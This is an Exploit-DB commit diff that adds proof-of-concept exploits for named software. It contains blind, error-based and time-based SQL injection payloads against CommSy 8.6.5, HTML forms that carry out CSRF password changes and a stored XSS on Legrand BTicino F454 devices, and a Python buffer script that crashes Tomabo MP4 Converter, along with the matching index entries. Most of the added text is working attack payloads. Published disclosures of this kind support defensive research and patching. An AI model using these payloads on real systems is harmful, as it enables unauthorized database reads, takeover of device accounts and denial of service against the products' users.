DB: 2019-05-16
4 changes to exploits/shellcodes Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC) CommSy 8.6.5 - SQL injection Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting
This commit is contained in:
Offensive Security
parent
b04843e5cb
commit
e8b59f945c
5 changed files with 201 additions and 1 deletions
|
|
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
|
||||
['URL', 'https://www.php-fusion.co.uk']
|
||||
['URL', 'https://www.php-fusion.co.uk'],
|
||||
['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
|
|
|||
56
exploits/php/webapps/46849.txt
Normal file
56
exploits/php/webapps/46849.txt
Normal file
|
|
@ -0,0 +1,56 @@
|
|||
Title:
|
||||
======
|
||||
CommSy 8.6.5 - SQL injection
|
||||
|
||||
Researcher:
|
||||
===========
|
||||
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
|
||||
|
||||
CVE-ID:
|
||||
=======
|
||||
CVE-2019-11880
|
||||
|
||||
Timeline:
|
||||
=========
|
||||
2019-04-15 Vulnerability discovered
|
||||
2019-04-15 Asked for security contact and PGP key
|
||||
2019-04-16 Send details to the vendor
|
||||
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
|
||||
2019-05-15 Public disclosure
|
||||
|
||||
Affected Products:
|
||||
==================
|
||||
CommSy <= 8.6.5
|
||||
|
||||
Vendor Homepage:
|
||||
================
|
||||
https://www.commsy.net
|
||||
|
||||
Details:
|
||||
========
|
||||
CommSy is a web-based community system, originally developed at the
|
||||
University of Hamburg, Germany, to support learning/working communities.
|
||||
We have discovered a unauthenticated SQL injection vulnerability in
|
||||
CommSy <= 8.6.5 that makes it possible to read all database content. The
|
||||
vulnerability exists in the HTTP GET parameter "cid".
|
||||
|
||||
Proof of Concept:
|
||||
=================
|
||||
boolean-based blind:
|
||||
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
|
||||
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
|
||||
|
||||
error-based:
|
||||
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
|
||||
COUNT(*),CONCAT(0x716a767871,(SELECT
|
||||
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
|
||||
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
|
||||
|
||||
time-based blind:
|
||||
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
|
||||
|
||||
Fix:
|
||||
====
|
||||
According to the manufacturer, the version branch 8.6 is no longer
|
||||
supported and the vulnerability will not be fixed. Customers should
|
||||
update to the newest version 9.2.
|
||||
118
exploits/php/webapps/46850.txt
Normal file
118
exploits/php/webapps/46850.txt
Normal file
|
|
@ -0,0 +1,118 @@
|
|||
<!--
|
||||
|
||||
Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit
|
||||
|
||||
|
||||
Vendor: BTicino S.p.A.
|
||||
Product web page: https://www.bticino.com
|
||||
|
||||
Affected version: Hardware Platform: F454
|
||||
Firmware version: 1.0.51
|
||||
Driver Manager version: 1.1.14
|
||||
|
||||
Summary: Audio/video web server for the remote control of the
|
||||
system using web pages or the MY HOME portal. The device can
|
||||
operate as a gateway for the use of the MHVisual and Virtual
|
||||
Configurator software - 6 DIN modules. It replaces item F453
|
||||
and F453AV.
|
||||
|
||||
Desc: The application interface allows users to perform certain
|
||||
actions via HTTP requests without performing any validity checks
|
||||
to verify the requests. This can be exploited to perform certain
|
||||
actions with administrative privileges if a logged-in user visits
|
||||
a malicious web site.
|
||||
|
||||
Tested on: Apache/2.2.14 (Unix)
|
||||
OpenSSL/1.0.0d
|
||||
PHP/5.1.6
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5521
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php
|
||||
|
||||
30.04.2019
|
||||
|
||||
-->
|
||||
|
||||
|
||||
<!-- CSRF PoC web access password change -->
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
|
||||
<input type="hidden" name="password1" value="newpass123" />
|
||||
<input type="hidden" name="password2" value="newpass123" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
<!-- CSRF PoC OpenWebNet password change -->
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
|
||||
<input type="hidden" name="ownpassword" value="ilegnisi" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
<!--
|
||||
|
||||
Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit
|
||||
|
||||
|
||||
Vendor: BTicino S.p.A.
|
||||
Product web page: https://www.bticino.com
|
||||
|
||||
Affected version: Hardware Platform: F454
|
||||
Firmware version: 1.0.51
|
||||
Driver Manager version: 1.1.14
|
||||
|
||||
Summary: Audio/video web server for the remote control of the
|
||||
system using web pages or the MY HOME portal. The device can
|
||||
operate as a gateway for the use of the MHVisual and Virtual
|
||||
Configurator software - 6 DIN modules. It replaces item F453
|
||||
and F453AV.
|
||||
|
||||
Desc: The application suffers from an authenticated stored XSS
|
||||
via GET request. The issue is triggered when input passed via
|
||||
the GET parameter 'server' is not properly sanitized before
|
||||
being returned to the user. This can be exploited to execute
|
||||
arbitrary HTML and script code in a user's browser session in
|
||||
context of an affected site.
|
||||
|
||||
Tested on: Apache/2.2.14 (Unix)
|
||||
OpenSSL/1.0.0d
|
||||
PHP/5.1.6
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5522
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php
|
||||
|
||||
30.04.2019
|
||||
|
||||
-->
|
||||
|
||||
|
||||
<!-- Stored XSS via GET request -->
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://192.168.1.66:8080/system/time.ntp.php">
|
||||
<input type="hidden" name="mode" value="mine" />
|
||||
<input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
|
||||
<input type="submit" value="Signal" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->
|
||||
22
exploits/windows/dos/46848.py
Executable file
22
exploits/windows/dos/46848.py
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
|
||||
# Date: 14/05/2019
|
||||
# Author: Alejandra Sánchez
|
||||
# Vendor Homepage: http://www.tomabo.com/
|
||||
# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
|
||||
# Version: 3.25.22
|
||||
# Tested on: Windows 10
|
||||
|
||||
# Proof of Concept:
|
||||
# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
|
||||
# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
|
||||
# 3.- Open MP4 Converter
|
||||
# 4.- Select 'Options' > 'Video/Audio Formats'
|
||||
# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
|
||||
# 6.- Click 'OK' and click 'Reset All'
|
||||
# 7.- Crashed
|
||||
|
||||
buffer = "\x41" * 10000
|
||||
f = open ("MP4Converter.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
|
|
@ -6426,6 +6426,7 @@ id,file,description,date,author,type,platform,port
|
|||
46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
|
||||
46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
|
||||
46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
|
||||
46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -41272,3 +41273,5 @@ id,file,description,date,author,type,platform,port
|
|||
46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware,
|
||||
46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80
|
||||
46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
|
||||
46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
|
||||
46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue